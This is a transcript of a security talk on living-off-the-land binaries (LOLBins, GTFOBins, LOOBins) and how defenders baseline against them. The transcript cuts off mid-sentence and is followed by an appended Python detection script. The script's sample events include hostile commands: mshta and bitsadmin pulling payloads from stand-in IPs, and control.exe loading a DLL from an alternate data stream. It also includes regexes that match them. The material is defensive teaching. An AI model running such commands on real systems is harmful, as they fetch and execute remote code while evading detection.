
Good afternoon everyone. I know after-lunch presentations usually are a little bit sluggish, so welcome to "I Make Them Good Processes Go Bad." I was going to play the audio, you know, "I make them good"... yeah, no, I'm not going to sing it, I might mess with YouTube filters and stuff. So we're going to deep dive on LOLBins and GTFOBins.

Really quick, who here knows what a CYA slide is, what that stands for? Okay. If you don't know what it is, it's just legal disclaimer stuff. I have to say it because I don't want you guys to think that this is any of the positions of my current or former employers; this is all me, this is all my personal opinion. I want to tell you guys, just like when it comes to hacking, don't attempt anything in this presentation without prior authorization, especially when it comes to systems you might not own. Make sure you vet everything with the proper legal, HR, management, blah blah blah. Keep your ethics high and don't become what you are defending against.

I always like to include the synopsis slide just in case people have an idea of what this presentation is about and then it really winds up not being it. I don't know how many of you guys are fans of The Office, when Pam winds up in the wrong class and the teacher's just like, "nah, sit down." So that's kind of why I include this slide: if it's, you know, "okay, I'm in the wrong presentation," well, you guys have time to leave now. So we're going to talk about LOLBins, GTFOBins and LOOBins. Does anybody know what a LOOBin is? Yeah, this one's pretty new, but we're going to be talking about that. A little bit of the history of them. I like to include an "explain like I'm five," because I understand that there's going to be different levels of experience with this stuff, so I always start off with an explain like I'm five and then we move on to the attacker and defender perspective, anything that's commonly abused, and then some real-world examples and some wrap-ups.

A little bit about me: I'm an advanced threat hunter. If you really want to know where, you can look me up on LinkedIn, but I don't like to advertise it because it's really easy to find out where I work, and I like to present as a subject matter expert; it just makes things a little bit easier for me from a legal compliance standpoint. I do a lot of research on the side. If you guys meet up with my boyfriend, he's here, he has to drag me away from the computer sometimes because I spend way too much time on it, but I like to do a lot of research, and because of that research you guys are going to see a LOLBin that has not been disclosed to the LOLBAS project today; about a server of 300 people on Discord know about it, so you guys are getting a sneak peek at that thanks to research. I have some certifications, you know, like the CISSP, Azure Fundamentals, whatever. I am in the top one percent of TryHackMe and I'm currently on a 600-day streak, and if anybody knows how to break streaks please help me, because I don't know how to break this without feeling terrible about myself. But yeah, so, a member of InfraGard. I'm also on the Technology Advisory Board of Grand Island. I like to box; I box out of Casels in Niagara Falls, if you guys want to actually try an old-school boxing routine come check me out. I recently did earn my black belt out of there in kickboxing too, so don't mess with the nerd. And then I also do a lot of rucking, and I'm like a corporate liaison for the KIA Memorial Market, which is a local charity here that helps veterans in need when it comes to, you know, food or assistance and stuff like that.

So we're getting on to why you're actually here. So who knows what a LOLBin is in my area? Yep. Do you know what it does? "It's a command that already exists, generally you know it, and that's badness." Yeah, exactly. So the actual definition is executables that are part of an operating system that can be exploited for an attack. In my opinion anything could be a LOLBin, GTFOBin, LOOBin if you try hard enough, probably, which is what I'm finding with my research anyways. So there are a number of different projects that actually track this stuff and we will go through this stuff; my pointer actually is showing up a little bit. So LOLBins, again, is Windows, and yep, that stands for living off the land binaries, like you explained. GTFOBins, I was always kind of concerned about how to approach this one, because I'm sure everybody knows what GTFO stands for, and how do I actually say it in a presentation? So we're just going to go with GTFOBins, and those are Linux binaries. And then LOOBins stands for living off the orchard binaries, and that's a brand-new project that involves macOS, and I've seen quite a few Mac devices around here, so this is a good one to get to know, and I will be showing you the website in a little bit.

Before we get really rolling in it, there's a history behind it. Living off the land actually came from a presentation at DerbyCon. Did anybody have the opportunity to go to DerbyCon before it closed? I'm really jealous. DerbyCon was run by TrustedSec. So living off the land first kind of appeared in 2013. Christopher Campbell and Matthew Graeber at DerbyCon 3.0 were talking about pen testing, though; so they were talking about, as a pen tester, how do we get away with some of our attacks, and that's where living off the land actually started to churn the masses, I guess. But for years there were so many different names for it. My favorite name is misplaced trust binaries; so that's what people were calling these LOLBins before they were LOLBins: surrogate programs, proxy binaries, all that sort of stuff. And then, as always, somebody on Twitter... which, infosec Twitter, if you guys aren't a part of it... I'm not going to get into the politics of Twitter; I have a Mastodon, I have a lurker Twitter, it's where I find my information. So somebody at a point was just like, "hey, can we just come up with a name for these things so we're not all calling it something different?" And so the best way to do that was a Twitter poll. So with 40, no, 34 votes, everybody decided on surrogate binaries. But as Twitter happens, that didn't stick, because somebody was like, "hey, I propose living off the land binaries, because I like that name." And then Oddvar Moe, who had heard that from Philip Goh, was like, "hey, why don't we do living off the land binaries instead of surrogate binaries?" And if you don't know Oddvar Moe, he currently works for TrustedSec, I do believe; he is kind of the founder of the projects, more or less. So he proposed that idea, and in Twitter cybersecurity fashion there was another poll, and so this poll eventually put it to rest: there were 49 votes and a nice percentage, and history was made. And unlike many cybersecurity professionals who go "hey, this is a really good idea," he actually picked it up. You know how many times have you guys in your company gone "hey, we should do this" and then nobody implements it because nobody wants to take on the work? So kudos: he ran the final poll, he spread LOLBins far and wide, and then he started documenting it in the LOLBAS project. So that's a cool story, right?

But what do you actually mean by executables that are part of an operating system that can be exploited in an attack? What exactly are they? And this is where we get into the explain-like-I'm-five situation, because if I can't explain it properly to a five-year-old then I'm not doing my job very well. So here to help me explain is everybody's favorite paper clip, Clippy... wait a minute, I don't own the rights to Clippy, I might get in trouble. So here's Clipper to explain. I actually tried a whole bunch of ways to get AI to generate some version of a knockoff Clippy for me and it didn't work out very well, it was really scary; I'll post a couple of those really creepy examples later on. But so here's Clipper to explain. Yes, I made him in MS Paint, and it was fun. So here's Clipper. He is very helpful, he's built into your operating system, he's here to help you with all your needs. You can trust him because he was there with the system; security knows him. And then, unfortunately, this malware also knows that he's a thing. But if the malware executes, then security will most likely catch on to him. So what's malware to do? "Hey Clipper, will you help me? I'm just a normal process." And it's not Clipper's... like, it's not his prerogative to decide what's normal or what's not; he's just doing what's being asked of him. So he's here to help with all the technical needs. So by executing through this legitimate process he kind of avoids detection*, and I put the asterisk there because there are security tools out there that can detect this sort of stuff, so I'm not saying that if you work through LOLBins you instantly won't be detected. But security is like, "huh, that's weird, but it's Clipper, so that's kind of fine," and then the malware is able to execute. So I know that was a very, very basic idea of it, but again I don't know what level we're working with here; some people might have never heard of a LOLBin before. But the same goes for GTFOBins and LOOBins; it's all the same concept, it's just depending on which operating system you're working through.

So again, they have legitimate libraries. I included a couple of screenshots just trying to familiarize you with what we might be working with. So these programs have legitimate uses, like for operating support, so you can't just shut them off. Instead of packaging everything together, some malware providers like to use these, so it makes their malware smaller and it makes it a little bit easier to smuggle in. So instead of, like, "hey, I'll do a phishing campaign," you know, if they manage to get into a system, then they might use something else to call their malware in. There's a whole bunch of different ways that you can go about this. The lists are quite long now in the projects, so it's kind of difficult to stay up to date, but that's why, you know, thank you to the Oddvar Moes of the world who keep these projects up to date.

So we're going to clarify what it is, because there's a lot of misconceptions about what actually is a LOLBin, and it's starting to expand a little bit, but traditionally it was a signed file or binary native to the operating system, or it could be downloaded from the official site. So what I mean by that is, how many of you guys are familiar with the Microsoft suite where it might have a PsExec or something like that? Sometimes it's on operating systems natively; sometimes you have to download that separately and bring it in. I know a lot of corporations who do that: they install more of a stripped operating system without all the fancy developer tools and then people download them later anyways. So that was the original intent. And then they have to have an unexpected functionality. So when you think about that, if I do a net use to map a network drive, that's what it's used for, so that's not a LOLBin. But if I use, like, mshta, which is used to service HTA files, but it can also download a remote payload, that's considered a LOLBin, because it's not natively used to download payloads. The functionality is also kind of focused on what threat actors and red teams can use, so if it's something that, you know, you're not going to see a threat actor use a particular LOLBin for a reason, then it's not technically a LOLBin. But interesting functions by definition can be executing code, different file operations such as read, write, execute, upload, download, that sort of stuff.

So we're going to check out these sites really quick, because sometimes it helps to see them rather than me just talking about them. So please bear with the transition really quick... my mouse fell asleep. Okay, so this is the LOLBAS project, and it's actually going to be kind of difficult for me to navigate from here. So each of these is a binary that you can find on Windows. We might just stick with LOLBins for now, because Windows is most common. But when you go in you see all these different functions, so what it can be used for; some of them have many functions, and those are ones you want to be a little bit more careful about. And then each of these is also mapped to MITRE ATT&CK, so I know a lot of management, a lot of compliance groups, audit, they like to see some sort of framework when it comes to this sort of stuff. So if we just... what's one of my favorite ones? Let's just go to control.exe. So when you go into each of these it gives you a definition of what it is, where it can be found, different resources from the researchers on how it's been abused, and then there are also these things called detections and Sigma rules; sometimes you'll see stuff like Elastic. It's all just different detections that the blue team uses to, you know, get rid of this stuff. So this is the actual LOLBin, a.k.a. the unexpected functionality: so it can be used to execute alternate data streams, and this here is an example of it. So typically if you see something like this in the logs where it's like control.exe, you typically see that as a standalone, but when it's paired with this sort of file path calling another binary, that's what the actual malicious execution of it is. So it can be used to evade defenses, to hide, you know, persistence mechanisms and stuff like that. Thank you, I lost my mouse. All right, we're going to move back this way.

So I'll show you GTFOBins. Same when it comes to Linux binaries: we have the same situation where you have the binary that's already built into Linux, 7-Zip, what it's meant to do, and then how you can abuse it. Here's LOOBins, which is the macOS version, and this one's relatively brand new. So if you guys are Mac users and you're really knowledgeable with the different Mac binaries, consider actually doing research and submitting it to the Orchard project, because like I said it's brand new. Threat actors have begun to compromise Macs; I know everybody likes to think that macOS is super hard and secure, nobody can get past it, but they're slowly turning their attention to it. So this is again the Mac project.

All right, so why do threat actors use them, why do red teamers use them? Well, they're kind of stealthy. And I mean, how many blue teamers out there actually know their environment to a T, or know every single binary that exists on a system, and on top of all that know what that binary is supposed to look like in their logs? That's kind of a tall ask. So they like to use these built-in programs to carry out malicious stuff, and take advantage of it by not having to package it in with their code; it makes it a little bit more lightweight, makes it easier to abuse the system, more or less. And again, it makes it harder for security systems to detect them. And on top of it all, when it comes to programs, it's really easy: "okay, we don't want TeamViewer in our environment, we'll just block it." Well, you can't exactly block certutil, you can't exactly block the command line, you can't necessarily block all this sort of stuff. So they know it's going to be there; if they can figure out what sort of operating system you're running, the tools are already there. So it makes it really fun for them and then makes it really terrible for the defenders.

So how do they ID and exploit? How does a LOLBin become a LOLBin? Research, lots and lots and lots of research. So like I said, fingerprinting an operating system gives them a leg up, and then all you have to do is look at the same sites; you know, they're not just for blue teamers. If they look at the website and are like, "okay, well, I didn't know that this binary existed," it's right then and there. So I like this meme in particular. RDP isn't a LOLBin, but it's sort of the same concept, where blue teamers are looking for the bad stuff; okay, like blue teamers are looking for a Cobalt Strike, they're looking for, you know, a Bitcoin miner; they're not looking for RDP necessarily, because RDP is used throughout your environment. I mean, even if you were like, "hey, let's look up who's RDPing where," if you look up rdpclip.exe, the amount of logs you're going to get back is going to be terrible. And obviously you can kind of use context if you know your environment well enough, like, okay, maybe a support desk technician should be using RDP, but why is this marketing director? So again it's not super straightforward when it comes to looking for this sort of stuff, but that's kind of a good meme to showcase why it's so difficult.

So let's look at an attack really quick. I chose bitsadmin because it's probably one that you guys should be aware of. So it's a command-line tool where you can download stuff, you can update jobs, and when I was first looking for this in our environment I was like, okay, nobody should be using it, it's probably not that common; and lo and behold, people were using it. So what happens typically with a malicious actor is they will come up with some sort of drop file, like a BAT file or an LNK file, which downloads another payload, and I don't know if you're going to be able to see this text really well, but they use bitsadmin to transfer basically the payload out of this LNK file to call a stager. And again, like we said with bitsadmin, that's kind of its purpose, so this one kind of starts falling into a little bit deeper of a definition of what a LOLBin actually is. But bitsadmin, traditional software: you know, you can probably block typical stuff with a proxy, but how many of you guys are blocking a command shell through your proxy? You know, you're probably using typical Chrome or Firefox, you have your proxy blocks there, but not through the command line. So bitsadmin will call the malicious payload, it'll download stuff, and lo and behold you have a whole bunch of badness. And typically they'll use some sort of LOLBin to either call an encryption process, which is what happens with ransomware, as there is an encrypt DLL which is another already built-in product in Microsoft, or it could do a whole bunch of other badness, like this one calls an interpreter, which, if you guys aren't looking for an interpreter, if you see something like that and it's not in an environment where you'd typically expect to see it, like, you know, your red team using it, then that's another one you want to block.

So this all sounds terrible for the blue team. What can we do? Baseline. Figure out what's normal in your environment. There are a lot of LOLBins, there are a lot of GTFOBins, there are a lot of LOOBins listed on those websites; it's going to take a while. But what you could do is, if you have any sort of Windows process logs, if you have an EDR system, if you have any of that stuff, just start throwing them in and figure out which ones you never see, and if you never see them then just write a detection, like, "hey, this should never happen in our environment." You're going to hit a lot of work, unfortunately; like I said, there are processes that get called all the time, there are a lot of executables that get used all the time. If you want to, you can probably start carving those out, like, okay, our developers are allowed to use that, our system engineers are allowed to use that. It's a lot of work, but trust me, it's worth it in the long run. And then if you don't know, figure out what the existing features are with a product. So let's just say xwizard. So xwizard has a whole bunch of different products, or different features you can run, like different flags; maybe it's normal to see a /s or a /x, I'm just making these up off the top of my head; you'll have to go and look at the official Microsoft documentation, and that's my face when I look at the official Microsoft documentation, so I apologize right now, then and there. But so if you see stuff that's typically normal, like, okay, it typically runs in this fashion, it's a scripted job that we can whitelist; if it's anything else, then that might be bad. So this is the of
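One way to turn the baselining advice above into a check, as an added example that is not part of the talk: it counts how often each LOLBin shows up in a window of constructed process-creation events, carves out a scripted patch job the way the talk describes whitelisting known-normal flags, and flags what is left when it is rare or when its command line shows the unexpected functionality (a BITS download, a remote HTA, control.exe handed an alternate data stream). The user names, hosts, allowlist entry and the short LOLBin set are assumptions.

```python
import re
from collections import Counter

# Constructed sample process-creation events (not real logs): user, image, command line.
EVENTS = [
    {"user": "svc_patch", "image": "bitsadmin.exe",
     "cmd": "bitsadmin /transfer kb /download /priority normal http://updates.corp.example/kb.msu C:\\patches\\kb.msu"},
    {"user": "svc_patch", "image": "bitsadmin.exe",
     "cmd": "bitsadmin /transfer kb /download /priority normal http://updates.corp.example/kb2.msu C:\\patches\\kb2.msu"},
    {"user": "helpdesk1", "image": "rdpclip.exe", "cmd": "rdpclip"},
    {"user": "helpdesk2", "image": "rdpclip.exe", "cmd": "rdpclip"},
    {"user": "jdoe", "image": "mshta.exe", "cmd": "mshta http://203.0.113.5/index.hta"},
    {"user": "jdoe", "image": "control.exe",
     "cmd": "control.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\notes.txt:payload.dll"},
    {"user": "mktg_director", "image": "bitsadmin.exe",
     "cmd": "bitsadmin /transfer job /download /priority high http://203.0.113.9/a.bat C:\\Users\\Public\\a.bat"},
]

# The binaries the talk names; a real deployment would load the full LOLBAS list instead.
LOLBINS = {"bitsadmin.exe", "mshta.exe", "control.exe", "certutil.exe", "xwizard.exe", "rdpclip.exe"}

# Known-good scripted jobs as (user, image, command-line regex); hypothetical, per environment.
ALLOWLIST = [
    ("svc_patch", "bitsadmin.exe",
     re.compile(r"^bitsadmin /transfer \S+ /download /priority normal http://updates\.corp\.example/")),
]

# Command-line shapes that correspond to the "unexpected functionality" the talk describes.
ABUSE_PATTERNS = {
    "control.exe": re.compile(r":[^\\/:\s]+\.(dll|cpl)\b", re.I),  # alternate data stream as the target
    "mshta.exe": re.compile(r"https?://", re.I),                    # HTA fetched from a remote host
    "bitsadmin.exe": re.compile(r"/transfer\b.*https?://", re.I),  # BITS download job
}

RARE_MAX = 1  # a LOLBin seen this many times or fewer in the window is "never normally seen"

def baseline(events):
    """Count how often each LOLBin image appears in the window; this is the 'what is normal' step."""
    return Counter(e["image"] for e in events if e["image"] in LOLBINS)

def is_allowlisted(event):
    return any(event["user"] == u and event["image"] == img and rx.search(event["cmd"])
               for u, img, rx in ALLOWLIST)

def triage(events):
    """Return (user, image, reasons) for LOLBin events that are rare or match an abuse pattern."""
    counts = baseline(events)
    findings = []
    for e in events:
        if e["image"] not in LOLBINS or is_allowlisted(e):
            continue
        reasons = []
        if counts[e["image"]] <= RARE_MAX:
            reasons.append("rare-in-baseline")
        if (rx := ABUSE_PATTERNS.get(e["image"])) and rx.search(e["cmd"]):
            reasons.append("abuse-pattern")
        if reasons:
            findings.append((e["user"], e["image"], reasons))
    return findings
```

Run on the sample window, the two helpdesk rdpclip events stay quiet (common, no pattern) and the patch job is carved out, while the remote HTA, the ADS path and the marketing director's BITS download are surfaced with the reason attached.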